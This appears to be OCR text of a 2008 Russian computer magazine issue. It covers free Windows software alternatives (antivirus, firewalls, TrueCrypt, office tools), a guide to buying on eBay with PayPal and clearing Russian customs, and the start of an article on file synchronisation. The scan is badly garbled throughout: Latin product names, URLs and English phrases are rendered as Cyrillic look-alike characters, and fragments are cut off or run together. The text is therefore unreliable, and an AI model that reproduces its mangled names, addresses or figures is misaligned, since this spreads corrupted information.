АІМР2 (ѵѵѵѵѵѵ.аітр.ги|. Удобный и красивый аудиоплеер. 
6Х::Тгап8СОСІег (\ѵѵ\п/ѵ.§егтапіхйап5Собег.<іе). Конвертации 
аудио и видеофайлов. 

ѴЬС Медиаплеер. 

ѴігіиаШиЬ (тѵш.ѵігШа1с1иЬ.ог§) . Легендарный видеоредактор. 
Аисіаску Простое средство для записи 

и редактирования звука. 



[ТИВИРУСЫ И БРЭНДМАУЭРЫ| 



СІатѴѴіп (ги.сі атѵѵіп.сот) . Свободный антивирусный сканер. 
аѵа8(! Ноте ЕсНііоп ІаШзЫЦМ . Антивирусный пакет. 

Сотого АпііѴігив (ѵѵѵѵѵѵ.апгіѵігиз.сотобо.сот). Полноценный 
антивирус. 

Сотого РігеѴѴаІІ (ѵѵѵ\д/ѵ.рег50паШгеѵѵа11.сотобо.сот) . Бранд- 
мауэр. 

АѴ2 (ѵѵѵѵш.г-оіе^.сот/зесиг/аѵг). Полуавтоматический антивирус. 
Аѵіга (ітее-аѵ. бе). Известнейший антивирус. 

АзЬатроо РігеѵѵаІІ • Компактный 

файрвол. 



ИНТЕРНЕТ 



МогШа Ріге^ох ІШМіШИШІШШ . Расширяемый браузер. 
Орега Быстрый и безопасный браузер. 



[ФАЙЛОВЫЕ МЕНЕДЖЕРЫ! 



ітееСоттапсІег (ѵѵѵѵѵѵбгеесоттапбег. сот). Двухпанельный 
файловый менеджер. 

хр1огег2 . Файловый менеджер. 



Н АНТИВИРУСЫ , АНТИВИРУСЫ 

ИЩП ИАѴА5ТІН0МЕ 
/.АѴА5Т.С0М 




НТИВИРУС КАСПЕРСКОГО, N0032, 
РК.ѴѴЕВ И ПРОЧИЕ 

ШЕП1ІШСШН АѴІКААМТІѴІК > АѴА5Т! НОМЕ 
ЕОІТІОЫ 



Без антивирусных средств и персонального файрвола в наше время в 
Сеть лучше не выходить. Стоиттолько высунуться, как на тебя уже летит 
рой всякой заразы. До моей «тотальной легализации» на компе душа в 
душу жили йг.ѴѴеЬ и Оиірові РігеѵѵаІІ. Обеими программами я поль- 
зовался больше пяти лет и успел к ним здорово привыкнуть. Поэтому 
меня даже посещали мысли раскошелиться на лицензию (благо, за эти 
продукты просят не сильно много денег), но я все-таки решил поискать 
бесплатные альтернативы. Не может же быть та ко го, что никто из про- 
граммистов не попытался сделать бесплатный антивирь и ЛгеѵѵаШ 



[ТЕКСТОВЫЕ РЕДАКТОРЫ И ПРОЦЕССОРЫ! 



ОрепОШсе.ог^ (пі.орепоШсе.ог^). Альтернатива МісгозоЙ: 
ОНісе. 

АЪіѵѵогсІ (ѵѵѵѵѵѵ.аЬізоигсе. сот). Свободный текстовый процес- 
сор. 

РРРСгеаіог (уѵѵѵѵѵ. р(б|бр||е . Ц . Создание РПР из любого при- 
ложения. 

Есіірве (ѵѵѵѵѵѵ.есіірзе.ог^). Многофункциональная ГОЕ для 
разработчиков. 

Мо1:ерас1+ + (поі|§§§||-р1и5 . зоигсебо|||ДіеГ) . Бесплатный редак- 
тор текстовых файлов. 



|РАБОТА С ДИСКАМИ| 



РеерВигпег Ргее . Программа для запи- 

си СП и ПѴП-дисков. 

8та11 СР-ѴѴгііег ( ѵтаШ ^ІД ШШіІ . Быстрая запись дисков. 

СРех ІИіеЖ.зс ЩШИИІіШ . Оцифровка аудио-СП. 
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Других открытых средств для шифрования данных кроме ТгиеСгурІ практи- 
чески нет 
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Недавняя разработка РеаЕІР уже завоевала большую популярность 




№ 



* г'-.--:..',--- 

Один из немногих бесплатных и работающих фай рволов — Согшобо 
Регвопаі Рігеѵѵаіі 



Немного побродив по инету, я нашел несколько халявных антивирусов. 
Больше всех приглянулся АѵавЧ Ноте. Это платный по своей сущности 
антивирус, но для некоммерческого использования разработчики отдают 
его безвозмездно. 

Чтобы убедиться в работоспособности антивиря, я установил его под 
виртуальной машиной, вылез из нее же в и нет и решил побегать по сай- 
там с кряками — в надежде подхватить какую-нибудь заразу. Для улуч- 
шения улова я заюзал ІЕ шестой версии, славящийся нулевой безопас- 
ностью. Не прошло и получаса, АѵавЧ начал орать, как резаный, сообщая 
о найденной угрозе. Отлично, следовательно, эвристикантивируса был 
живым и работоспособным. Антивирусный сканертакже показал себя с 
хорошей стороны. Все подсунутые вирусы были найдены и обезврежены. 
После про веде иных тесто в АѵавН перекочевал из виртуальной машины в 
рабочую ОС и живет тут до сих пор, не забывая регулярно обновляться. 



г файрвол 



апя^іідійГіД :оморо рерзоыаь рівеѵѵаы. рво 
Дсомор о.сом 

ПШИА6ШТІІМ 01ІТР05Т (699 РУБЛЕЙ В ГОД) 
ЯіЫЯИ РС Т00І-5 РІВЕѴѴАИ. РШ5 



хуже Оиірові обеспечивает защищенность твоего пребывания в 
Сети и обустроит локальную безопасность с помощью хорошо про- 
думанной проактивной защиты и наличия антивирусного сканера. 
Компоненты СРР очень гибки в настройке, поэтому все можно 
подогнать максимум под себя. Из ключевых возможностей стоит 
отметить: 

• Качественный сетевой экран. 

• Гибкая в настройке проактивная защита. 

• Быстрый и качественный АабѵѴѴаге/БруѴѴаге-сканер. 

• Хорошая конфигурация защиты в целом. 



В ШИФРОВАНИ Е ДАННЫХ 

ІЧЖШТВУЕСВѴРТ 
ТВІІЕСВѴРТ.ОВО 

РВІѴАТЕРІ5К ($ 70 . 00 ), ВЕ5ТСВѴРТ 

(€59-95) 

ШШШШШоииРЬ 



Конфиденциальные данные я всегда хранил на защищенном 
диске, созданном в программе Ргіѵаіе й ізк. Среди бесплатных 
альтернатив я обратил внимание на утилиту ТгиеСгурІ. Она также 
позволяет создать защищенный контейнер, который может быть 
смонтирован в системе и использоваться, как обычный диск. 
ТгиеСгурІ позволяет самостоятельно выбрать алгоритм шифрова- 
ния для создаваемого контейнера. Из алгоритмов ктвоим услугам: 
АЕ5, Бегрепі, Тѵѵо ЕвЬ, АЕ5-іѵѵо 1ч в И ит.д. Помимо создания защи- 
щенных контейнеров, ТгиеСгурІ, как и РгіѵаіеБізк, может создать 
защищенный раздел на флешке или просто зашифровать целиком 
раздел жесткого диска. 



Поиск альтернативы для моего любимого Оиірозі был весьма нелегким. 
Бесплатных персональных файрволов мне попалось всего четыре штуки, 
из которыхтри осеклись сразу, так как качества и стабильности в работе 
у них не наблюдалось. Я уже было подумал, что нормального продукта не 
найти, как вдруг Гугл вывел меня на сотобо.сот . где я и познакомился с 
будущим другом. 

Сотосіо Регвопаі Рігеѵѵаіі — не просто персональный брандмауэр. 
Это настоящий центр обеспечения безопасности. Он ничуть не 



г БЕСПЛАТНОМУ СОФТУ — «ДА!» 

Как видишь, вовсе необязательно юзать платный софт. Даже под 
ѴѴІпбоѵѵв существует множество бесплатных программ. Надо только 
потратить чуточку времени на их поиски, после чего спокойно работать 
и забыть о кряках. Не думай, что приведенные в статье программы 
— это предел и у них нет альтернатив. Есть, и много, поэтому если тебе 
не понравился предложенный мной вариант, то просто загляни на наш 
БѴБ и ты увидишь много других бесплатных программ. ПЕ 
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Суперпоиск 
на жар.тіз.ги 




в мобильном телефоне 



Звоните 059063 / ѵѵѵѵѵѵ.гтгіз.ги 



мтс оператор связи • ■"> 



РЕКЛАМА 







МАКСИМ СОКОЛОВ 



Не надоело переплачивать сотни баксов прожорливым продавцам? Или до 



вольствоваться скудным ас^^^^^^том, мечтая о том времени, когда све 
^^^гаджеты будут продаваться и у нас? Довольно! Сегодня ты научишься 



иобретать товары за рубежом, не только экономя, но и зара батывая 



а этом! 



АЧНЫЕ 



тчаявшийся после развода австралиец продает на аукци- 
оне еВау свою жизнь! Дом стремя спальнями, автомобиль, 
мощный байк и даже место работы, причем, последнее — с 
ведома работодателя, который согласился дать покупателю 
испытательный срок. И что ты думаешь? Натекущий моментужеЗб ставок 
— максимальная равна 31 Отысячам долларов. Стоитли говорить, что 
на аукционе еВау продаются и вещи менеезначимые: разнообразные 
гаджеты, техника, музыкальные инструменты, одежда, машины — сло- 
вом, все-все-все. Умельцы извлекают выгоду, нетолько удачно продавая 
товар, но и покупая. Типичный пример — коммуникатор іРЬопе, который в 
Россию никогда официально не ввозился, но стал продаваться сразу после 
появления (за огромные деньги). Многие из продавцов предварительно 
покупали его именно на западных аукционах. 

Н НАЧИНАЕМ РАБОТУ С ЕВАУ 

Воспользоваться аукционом может каждый. Регистрация на еВау [ ѵѵѵѵѵѵ. 
еЬаѵ.сот ) совершенно бесплатна и, в принципе, не должна вызвать каких- 
либо проблем. Некоторыетребования со стороны системы могут показаться 
странными (например, в качестве е-таіі нельзя использовать ящик на 
бесплатном сервисе), но нужно понимать, что это вынужденные меры для 
обеспечения максимальной безопасности. Итак, приступим! 

Кликнув по ссылке Редізіег, ты увидишь, что система предлагаетзаполнить 



специальную форму. Вспоминай английский. Заполнять поля нужно на этом 
языке: 

Соипбгу — страна проживания. По умолчанию стоит ІІпібесІ 
Збабез . Выбери из списка Зее аіі соипбгіез . На вновь 
открывшейся странице выбери свою страну . Кликни СНапде 
соипбгу 

Рігзб пате — имя 
Ьазб пате — фамилия 

Збгееб аббгезз — номер дома, название улицы, квартира. 
Например: 34 Ьепіпа Збг. Арр.12 
Сібу — город 

Розбаі собе — почтовый индекс 

Збабе / Ргоѵіпсе/ Кедіоп — край, область. К примеру: 
Мозкоѵзкауа оЫазб 

Ргітагу беіербюпе — основной телефон (включая код города) 
Етаіі аббгезз — без комментариев : ) 

Ке-епбег етаіі аббгезз — еще раз введи вручную е-таіі 
Сгеабе ап еВау бзег ІБ — логин, который будет использо- 
ваться для входа на аукцион. Нельзя использовать в качес- 
тве логина свой е-таіі, а также слово «еВау» 

Сгеабе раззтлгогб — пароль. Не должен содержать фрагментов 
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ЁСИ1 «М|?А№Рн«ѴИ 



Раздел сотовыхтелефонов и коммуникаторов на аукционе еВау 




1 1. СІЙСкЬі-* ВМ0ІФСН4 

РггуР.і! -■ р-иіі!<: і-іті 

"’Для каждого лота отображается информация о продавце с его| 
рейтингом. Этому, пожалуй, можно доверять| 



е-таіі ' а 

Ке-епСег раззѵгогсі — пароль еще раз 
ЗесгеС диезБіоп и ЗесгеС апзхѵег — секретные 
вопрос /ответ на случай, если забудешь пароль 
Бабе об ЪігСЪ. — дата твоего рождения 

Торговля на еВау основана на честности и рейтинге участни- 
ков. Поэтому сразу после регистрации необходимо зараба- 
тывать рейтинг, сделав хотя бы одну ставку. Очки в рейтинге 
накапливаются за счетсистемы отзывов — ІюебЬаск габпд 
вувіет. Сделка между продавцом и покупателем, как правило, 
заканчивается выставлением отзывов друг другу. За поло- 
жительный отзыв начисляется 1 очко, за нейтральный — 0, за 
отрицательный — «минус 1 ». Участники, набравшие десять 
очков и выше, получают «знаки отличия» — звездочки разных 
цветов. Верхом крутизны считается красная «летящая» звезда 
(100 000 очков). Когда ты только что зарегистрировался, ника- 
кого рейтинга утебя нет. Втечениетридцати дней ты будешь 
отмечен «значком новичка еВау». Учти, из-за этого некоторые 
продавцы могут не захотеть иметь с тобой дела. Поэтому, чем 
ранышеты начнешь строить отношения на аукционе (делать 
ставки) — тем лучше для тебя. Нужно сказать еще кое-что по 
поводу рейтинга. Репутация указывается под именем пользо- 
вателя и является процентным соотношением положитель- 
ных и отрицательных отзывов — скажем, «БеебЬаск: 99.1% 
Ровібѵе». Это, значит, что в истории пользователя есть отри- 
цательные отзывы, но их немного (полная история отзывов 
доступна, если нажать на цифру, указанную в скобках). 

В ПОИСКТОВАРА 

На аукционе представлены десятки миллионов самых разных 
предложений. Все они тщательно рассортированы по катего- 
риям, а мощный поиск и система фильтров помогут найти даже 
самый редкий товар. Какотыскать лучшее предложение? Все 
зависит отситуации, однако некоторые общие рекомендации 
приведены ниже: 

1. Предпочтительнее покупать у «небольших магазинов», 
которые занимаются продажей интересующего тебя товара 
постоянно (чем иметь дело стеми, кто продаеттовар неиз- 
вестного качества «разово»). Всегда можно ознакомиться с 
профайлом продавца, прочитать фидбеки и сделать выводы, 
что он собой представляет. Хотя очень большой рейтинг, оз- 
начающий, что продажи поставлены на конвейер, — тоже не 
всегда удачный вариант. И отправкутовара такой «оптовик» 
может задержать, и общается шаблонными фразами — сло- 
вом, лучше обратиться к проверенному «середнячку». 

Для многихтоваров помимо классического аукциона, в ходе 



которого определяются окончательная цена и победитель, 
доступна покупка «здесь и сейчас». Такие предложения, 
помеченныезначком Ьиу і* поѵѵ, предлагают купить товар, не 
ожидая окончания аукциона (но — по большей цене). Еслиты 
собираешься покупать новый товар, то ждать конца аукциона 
нет смысла, потому что, в конце концов, он все равно будет 
продан за полную стоимость (халявы не бывает!). Участвовать 
в аукционе, постоянно поднимая ставки, естьсмысл только в 
случае какого-нибудь редкого и бывшего в употреблении това- 
ра (кстати говоря, на еВау широко представлены автомобили). 
2. В описаниитовара в первую очередь смотри варианты до- 
ставки. Если видишь, что продавец работаетлишь с Америкой 
и Канадой, смело ищи другие предложения. Можно, конечно, 
рискнуть и спросить, не отправитли онтовар в Россию, но 
в абсолютном большинстве случаев ответом будеттвердое 
«Нет!». Поэтому нам нужны предложения, где в графе доставка 
указано слово ѴѴогІсіѵѵісІе («По всему миру») — или же в списке 
стран есть Европа. После некоторого времени, проведенно- 
го на аукционе, несложно заметить, что китайцы, японцы и 
прочие восточныетоварищи высылаюттовар «ѴѴогШѵѵісІе» на- 
много охотнее американцев. Также тебе необходимо выяснить 
возможные способы доставки и оценить, насколько они тебе 
подходят (подробнее о службах доставки читай ниже). 

^ ОПЛАТА ТОВАРА 

Большинство активных продавцов принимают платежи через 
РауРаІ. РауРаІ — это популярнейшая платежная система в 
Штатах, которая ктомуже принадлежит самому еВау. Система 
очень продуманная и защищенная; для оплаты нетребуются 
какие-либо дополнительные программы — все осуществляет- 
ся прямо на странице оплаты товара еВау (то есть, на странице 
браузера). Болеетого, нет необходимости переводить деньги 
на какой-то виртуальный счет. Аккаунт РауРаІ привязывается 
ктвоей пластиковой карте и снимаете нее деньги в момент 
оплаты (подробнее о работе с РауРаІ читай во врезке). Важно, 
что оплатив покупку с помощью РауРаІ, ты всегда можешь 
потребовать деньги назад, если тебя что-то неустроило или, 
например, товар оказался некачественный. При должной 
аргументации и доказательствах ты сможешь их вернуть (ко- 
нечно, если продавец к тому времени не скроется с деньгами 
в неизвестном направлении). В момент подачи жалобы РауРаІ 
блокирует сумму покупки на счете продавца и дает вам 20 
дней разобраться полюбовно. Когда миром решить вопрос 
неудается, в процесс вмешивается специальная служба (но 
до этого доходит крайне редко). Короче говоря, настоятельно 
рекомендую для оплаты использовать именно РауРаІ. 

Упомяну один важный нюанс. Многие продавцы вусловиях 




> ѵѵагпіпд 

Какой бы защищенной 
ни была система еВау 
и РауРаІ, риск остать- 
ся в дураках все равно 
есть. Внимательно 
изучай профайл 
продавца и описание 
товара. 




> ІП^О 

Можно, конечно, не 
морочить себе голову 
и доверитьторги, оп- 
лату и доставку товара 
посреднику (их легко 
найти через Яндекс), 
нов этом случае ты се- 
рьезно переплатишь 
за товар. 
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Для регистрации необходимо заполнить все поля на английском языке 
Корректность всех данных обязательна 



оплаты указывают Опіу сопйгтесі асісігезз — это значит, что они имеют дело 
только с тем аккаунтами РауРаІ, у которых подтвержден адрес владельца 
(в целях безопасности). Процедура верификации домашнего адреса для 
пользователей из России, к сожалению, недоступна. Это не отображается 
втвоем интерфейсе РауРаІ, но когда продавец получаетуведомление об 
оплате, в нем, помимо всего прочего, напротив адреса доставки красуется 
слово ШМСОМНГСМЕО. Рядом приводится устрашающая ссылочка, где 
рассказывается, что, возможно, это мошенничество. Вотони и боятся! 
Важно не спешить переводить деньги, а всегда сначала уточнять, можетли 
продавец выслать товар в Россию. Например, так: 

Беаг 8іг, 

Сап I Ъиу Еіііз іДеш? I изе РаураІ ЬиД ту асісігезз із поД 
сопіігтесі. ЬеД те кпслѵ зкірріпд созД До Киззіа. I Ііѵе іп 
Мозсом сіРу . 

Если поспешишьи, не спросив продавца, купишьлот, то он легко может 
испугаться отсутствия подтвержденного адреса и отказаться от продажи. 

В этом случаеты будешьждать до пятнадцати дней, когда тебе на счет 
вернутся твои же деньги за вычетом комиссии РаураГа, твоего банка и за 
конвертацию валют! 

Если продавец не принимает РауРаІ или требует подтвержденного адреса, 
то можно воспользоваться альтернативным вариантом платы — банковс- 
ким переводом. При наличии счета в банке, у которого есть поддержка услу- 
ги интернет-банкинга (атаковую сейчас предоставляют практически все), 
отправить деньги не составит труда. Но процедуры возврата средств в этом 
случае не предусмотрено. Попадешь на кидалово — останешься с носом! 
Через несколько дней после оплаты не поленись напомнить продавцу о 
совершении сделки сообщением: «Неііо, Ьаѵеуои зеп* ту Нет?». Если он 
еще не выслал товар, пусть поторопится. А если позиции нетв наличии,™, 
скорее всего, сразу вернут деньги — не будешь, какдурак, ждать неделями 
прихода товара, который даже не высылали. 

Н ДОСТАВКА И СРОКИ 

Как получить заказанныетовары? Многие почему-то считают, что все это 
«разводка» и ничего не дойдет. А если даже товар отправят, то его совер- 
шенноточно сопрут или разобьютподороге. Или придет... нотогда, когда ты 
и думать о нем забудешь. 

К счастью, все совсем не та к. Товар дойдет и дойдет в срок. 

Существует разные варианты доставки: через частые компании (известные 
брендытипа 0Н1_, РесІЕх, ІІР5) и государственные компании (ІІ5Р5 — США, 
Роуаітаіі — Британия, «Почта России» — Россия и т.д.). Частные компа- 
нии доставяттовар за несколько дней и вручатлично в руки, а весьмаршрут 
ты можешь проследить через трекинг-систему по инету. За сервис прихо- 
дится платить, причем дважды: за саму доставку (зависит от веса посылки, 
но едва ли выйдет меньше $40) и — в случае проблем — натаможне (об 
этом позже). Поэтому наш выбор — государственные компании. Поскольку 



мы рассматриваем американский еВауто подробно коснемся системы 
ІІ5Р5. Вариантов доставки у нее множество. Нас интересуюттолько самые 
ходовые: 

• ІІ8Р8 РгіогіОу таіі 

• ІІ8Р8 ЕігзЕ сіазз таіі 

• ІІ8Р8 Ехргезз таіі іпЕегпаСіопаІ (ЕМ8) 

Первые два варианта примерно одинаковы как по стоимости, так и по 
срокам доставки. ІІ5Р5 Ехргезз Маіі немного дороже, но считается опти- 
мальным. В зависимости от Штата отправки он появляется в России уже 
на второй или четвертый день (после чего попадает в очередь на таможне). 
Пройдя таможню, он встает в курьерскую отправку к вам на адрес (я сейчас 
про Москву). Таким образом, за посылкой не придется идти на почту (как в 
случае с двумя другими вариантами), а ее вручатлично заказчику. На всем 
пути следования посылка легко прослеживается на сайте ѵѵѵѵѵѵ.етзровЕги . 



Как правильно 
делать ставки? 

На странице с описанием любого из товаров есть кнопка Ріасе Вісі. 
Поле рядом — это сумма твоей ставки, которая должна быть выше 
текущей цены. Нажав на кнопку Ріасе Вій («Поставить ставку»), ты 
получаешь сообщение «Уои аге гЬе сиггегц ЫсИег». Оно означа- 

ет, что твоя ставка на данный момент самая высокая. Скорее всего, 
ставку кто-нибудь перебьет — купить ноутбук или видеокамеру за 
удачную цену желающих много. Но как сделать ставку правильно и не 
переплатить? И как вообще взимаются денежки? Аукцион еВау позво- 
ляет определить для себя максимальную сумму. Например, ты готов 
потратить $300. Ставишь бид «300» и идешь спать. Утром выясняется, 
что максимальная цена была достигнута в 180. Значит, из твоих 300 
долларов потратится 180 + «шаг», например, $5 или $85, а остальные 
деньги тебе вернутся. Таковы правила. 

Еще один хинт — досидеть до самого окончания торгов, лишний 
раз не поднимая текущую цену, и сделать ставку только в самом 
конце. Можно сидеть и караулить окончания аукциона самому: в три 
часа ночи, с красными офигевшими глазами. А можно — доверить 
процесс программным средствам — «снайперам», реализованным 
в виде специального софта. Многие, например, используют сервис 
езпіре.сот. который берет за свои услуги небольшой процент от 
каждого лота. Но знай: в этом случае ты предоставляешь логин и 
пароль для доступа к еВау-аккаунту чужим людям, пускай даже 
проверенным. 



► 030 



ХАКЕР 07 /115/ 08 





Можно даже узнать полную информацию, позвонив круглосуточным опера- 
торам «Почты России». Тарифы и время прохождения посылок из Америки 
можно рассчитать с помощью специального калькулятора на сайте ігсаіс. 
изрз.доѵ . 

Подводя итоги, скажем, что весь срок доставки товара складывается из трех 
составляющих: 

1 . Задержка в отправлении со стороны отправителя — как правило, от 1 до 5 
дней. У крупных продавцов она больше всего; 

2. Время в пути; 

3. Время, потраченное натаможню. 



Стало быть, ты сразу налетаешь на заполнение грузовой таможенной 
декларации, оплату ставки таможни по коду товара, а затем еще и НДС. 
Беспошлинный порог есть, но он составляет всего 5 тысяч рублей, а его 
соответствие товару проверяется очень строго. В случае задержания 
посылки утебя будеттри варианта: отправить посылку обратно, ехать на 
таможню в Домодедово или Шереметьево (для москвичей, само собой) 
или воспользоваться услугами фирмы доставки для растаможки (готовь 
не меньше 2-3 тысяч рублей). Суди сам, использовать эти службы — не 
вариант! 

Вкратце все, приятных покупок! •) .Ш 



Н ТАМОЖНЯ 

Таможня — структура нужная. Нельзя же все подряд волочь в Россию- 
матушку, есть и ограничения. Запрещается, к примеру, пересылать: 
парфюмерию, оружие, ножи, ценный антиквариат, табак и алкоголь. Если 
втвои планы не входит пересылать АК-47 или бутылки с вкусным ромом, 
то для почты будет действовать следующее правило: «физическое лицо 
может раз в неделю получать посылку стоимостью до 1 0 тысяч рублей 
без уплаты пошлины, при условии, что эти товары не предназначены 
для коммерческой деятельности». Проще говоря, любыетовары с ценой 
до десяти штук деревянных ты можешь ввозить абсолютно бесплатно. 

В противном случае — платишь30% со стоимости товара. Допустим, 
ты купил ноутбукза 1 2000 руб. Тогда таможнетебе надо отдать: (12000- 
1 0000) *0, 3=600 рублей и небольшую сумму (обычно 80 рублей) за проце- 
дуру досмотра. 

На территории России есть специальныетаможенные отделения при почте, 
куда стекаются посылки, а сотрудники проверяют их вес и оценку, а иногда 
— содержимое. Если стоимость посылки не превышает$400 и они в этом не 
сомневаются, то тут же ставят штамп «пропущено таможней» — и посылка 
отправляется прямиком в лапы нашей почты. Когда утаможенников возни- 
кают сомнения, они задерживают посылку и шлют адресату уведомление (в 
случае с ІІ5Р5 Ехргезз Маіітебе позвонят потелефону). Для разъяснения 
тебя будут ждать в течение двух недель. Во время встречитебе необходимо 
предъявить документы, подтверждающие стоимость посылки (распечатка 
сеВау или РауРаІ), а также заполнить заявление в произвольной форме, 
чтобы посылку пропустили. Ничего страшного и утомительно долгого в этой 
процедуре, поверь, нет. Список необходимых документов доступен на сайте 
ѵѵѵѵѵѵ.етзроэі.ги в разделе «Документы». Убедившись, что ты их не обма- 
нываешь, таможенники выпустят посылку без проблем. Иначе — заставят 
оплатить 30% от превышения 10 000 руб. 

Тутестьодин нюанс. Во времяторгов некоторые покупатели уговаривают 
продавца снизить стоимость посылки (инвойс), чтобы не платить налог. 

Если при этом посылкузадержали, никто тебя не посадит и не оштрафует. 
Просто пиши в заявлении реальную стоимость и фразу «Почему отправи- 
тель занизил стоимость посылки, я не знаю». Сразу после уплаты таможен- 
ных сборовтебе выдадут посылку. Натаможне в Москве — очередь. Заметь, 
в предновогодний сезон она можетзначительноувеличиваться. 

Теперь вернемся к Ц) Р5/РесІ Ех/Б Н Б/ТЫТ. В отличие от ІІ5Р5, эти частные 
конторы — не почтовые службы, а грузоперевозчики. Для них в нашем 
законодательстве предусмотрена особая таможенная специфика. Приве- 
зенное ими не попадает под льготные правила «растаможки» почтовых 
отправлений для частных лиц и растаможивается в полном объеме. 



Как пользоваться 
РауРаІ? 

С прошлого года пользователи из России и Украины могут легально 
получать аккаунты и оплачивать через РауРаІ любые услуги и товары. 
Для осуществления платежей необходимо сначала зарегистриро- 
ваться на сайте ѵѵѵѵѵѵ.раураі.сот. затем верифицировать свой е-таіі, 
привязать к аккаунту пластиковую карту и пройти соответствующую 
проверку. Вроде бы все просто, но есть и тонкости. 

Сразу после регистрации ты не сможешь пересылать посредством 
РауРаІ суммы, превышающие пороговое значение, устанавливаемое 
системой. Чтобы избавиться от этого ограничения, необходимо 
пройти еще одну проверку и получить статус верифицированного 
аккаунта. Выглядит это так: по твоему запросу РауРаІ списывает с кар- 
точки один доллар, при этом в описании платежа указывает специаль- 
ный код. Человек, реально не обладающий картой, этот код никогда 
не узнает, потому что он указывается только ежемесячном отчете 
о пользовании картой, который банк высылает владельцу по почте 
или е-таіі. Ждать конца месяца необязательно. Многие российские 
банки поддерживают услугу 5МЗ-банкинг и с каждой транзакцией 
присылают ЗМЗ-ку с суммой и описанием платежа (в котором указан 
секретный код РауРаІ) . Более того, могут выслать отчет по требова- 
нию. Так или иначе, полученный код верификации РауРаІ необходимо 
ввести на соответствующей странице платежной системы. После этого 
аккаунт будет верифицирован. 

Какие пластиковые карты подойдут для работы с РауРаІ? Само собой, 
дебетные карты и прочие извращения российских банков не подойдут 
— нужна добротная карта международных платежных систем, таких 
как Ѵіза и МазГегСагб (обслуживание стоит в районе 500-600 рублей 
в год) . Во многих случаях удобно использовать специальные карты 
для платежей через интернет: к примеру, Ѵіза ѴігШоп. Фишка в том, 
что держать на ней деньги совсем необязательно. При необходимости 
ты можешь перевести на счет нужную сумму (телефонным звонком 
или через банкомат) и оплатить нужную услугу. Ты не рискуешь стать 
жертвой мошенников, завладевших твоим РауРаІ-аккаунтом или 
данными о кредитке. 
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СИНХРОНИЗИРУЕМ ДАННЫЕ МЕЖДУ РАЗНЫМИ КОМПЬЮТЕРАМИ 





Каждый, кому приходится работать на разных компьютерах, знает, насколь- 



ко остро стоит проблема синхронизации. Нужный файл легко может ока- 



или, наоборот, дома. В лучшем случае у тебя буде т не самая 
последняя версия. Как быть? 



работаю на нескольких компьютерах. Даже во время написа- 
ния этого материала то и дело приходилось переключаться 
между офисной машиной и ноутбуком. Уверен, что проблема 
знакома итебе. В поиске решения чегоятолько не перепробо- 
вал! Например, часто используемые документы я стал держать на флешке. 
Воткнул в комп, и вот — перед тобой последняя, хоть и единственная, 
версия файла. 

В ИСПОЛЬЗУЙ ФЛЕШКУ СУМОМ 

Послетого, какфлешка несколько раз была оставлена непонятно где, 
а бэкап не делался с прошлой недели, заниматься подобной ерундой я 



перестал. Стало ясно, что держать да иные на одном носителе нельзя: 
необходимо сделать копию на компе и постоянно синхронизировать версии 
файлов. Мысль, что с этим придется возиться «вручную», прельщала мало. 
Тогда я стал использовать очень простой, но надежный инструменте лице 
бесплатной утилиты ЗупсТоу отМісгозоК [ ѵѵѵѵѵѵ.тісгозо^.сот/ргорЬоЫ . 
Программа сразу прижилась на компьютере и стала поддерживать иден- 
тичность данных с главной копией, которая лежала на флешке. Когда зада- 
ча сводится ксинхронизации двух папокс документами, — лучше и проще 
решения, пожалуй, не найти. Указываешь одну папку, затем — другую; после 
чего выбираешь направление синхронизации (в одну из сторон или в обе) и 
сохраняешьзадание. Можно смело синхронизировать данные! 
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Чего в ЗупсТоу сильно не хватает — та к это возможности 
выполнять синхронизацию автоматически. Разработчики 
предлагают использовать встроенный планировщикѴѴІпсІоѵѵз 
(а чего еще можно было ждать от М іеговой?). Но как наладить, 
например, синхронизацию сразу после того, как флешка 
вставлена в компьютер? Сначала я создавал на флешке 
аиіогип.іпб запускающий нужное задание ЗупсТоу, но со вре- 
менем изобретать такой велосипед мне надоело. Ксчастью, 
нашлась отличная программа АІІѵѵау Зупс [ ѵѵѵѵѵѵ.аЦѵѵаѵвѵпс. 
сот ]. Такие программы я люблю: один раз настроишь — и 
можно о ней не вспоминать. 

Рассказываю, как настроить автоматику. После простой 
процедуры создания нового задания, которая, фактически, 
сводится куказанию каталогов для синхронизации, выбираем 
в верхнем меню: «Задача Свойства Автоматическая 
синхронизация». 

Нам нужно, чтобы синхронизация происходила втот момент, 
когда ты вставляешь флешку в компьютер, и позже — через 
равные промежутки времени. Активируй в открытом окне со- 
ответствующие опции и сохрани настройки. Убедившись, что 
система работаетбезупречно, можешь ради интереса вставить 
другую флешку. О том, что произойдет, несложно догадаться 
— все файлы будут переданы на совершенно левый носитель. 
Допускать этого ни в коем случае нельзя: необходимо жестко 
назначить букву диска длятвоей рабочей флешки (допустим, 
X:). Открой «Пуск-> Панельуправления Администриро- 
вание -> Управление компьютером -> Управление дисками» 
и найди в списке нужный носитель. Кликни правой кнопкой 
мыши и выбери «Изменить буквудиска или путь кдиску». И не 
забудь проследить, чтобы в настройках задания была указана 
нужная буква! 

Возможности программы вовсе не ограничиваются синхро- 
низацией на одном компьютере. Посредством ЛазЬ-нако- 
пителя удобно, например, синхронизировать данные между 
домашней и рабочей машинами. Настраиватьзаново ничего 
не придется. Через меню «Файл -> Экспортировать» можно 
сохранить настройки и импортировать их на другие компьюте- 
ры, с которыми требуется синхронизация. 

г синхронизируй через инет 

Некоторые проблемы доступа к актуальной версии файла отпа- 
ли сами собой — с появлением онлайн-сервисов и практичес- 




ки повсеместного доступа в интернет. К примеру, для редакти- 
рования документов я стал активно использовать онлайновый 
офисный пакетбоодіе йосз І сІосБ.доодІе.сот ). Единственная 
актуальная версия всегда доступна на надежных серверах 
Ѳоодіе’а. Привыкнув к это му хранил ищу, я почувствовал, что 
мне стало сильно не хватать возможности хранить на сервере 
другиетипы файлов, кроме поддерживаемых бос, хіз, р 61, ррі. 
Новые сервисы для хранения файлов появляются каждый 
день. Нетакдавно открывшийся Народ.Диск— пагосі.ѵапсіех. 
ги/сіізк — предоставляет неограниченное пространство для 
твоих данных, лимитируя лишь максимальный размер доку- 
мента: 750 Мб (со сроком хранения три месяца для файлов, 
которыми никто не пользуется). Атеперь представь, что будет, 
если к этому сервису прикрутить специальную программу, 
которая устанавливалась бы на локальном компьютере, 
отслеживала изменения указанных ей файлов и всегда за- 
качивала в онлайн-хранилище актуальную версию. Устано- 
вил такую программу на другом компьютере — и получаешь 
прямой доступ к тем же документам. Любое изменение сразу 
отображается на сервере и, соответственно, в локальной 
версии файлов на каждой из машин. Круто? Ксожалению, 
найти подобную тулзу у меня не вышло. Зато нашелся сервис, 
который прекрасно реализуетэту мою идею. Знакомьтесь 

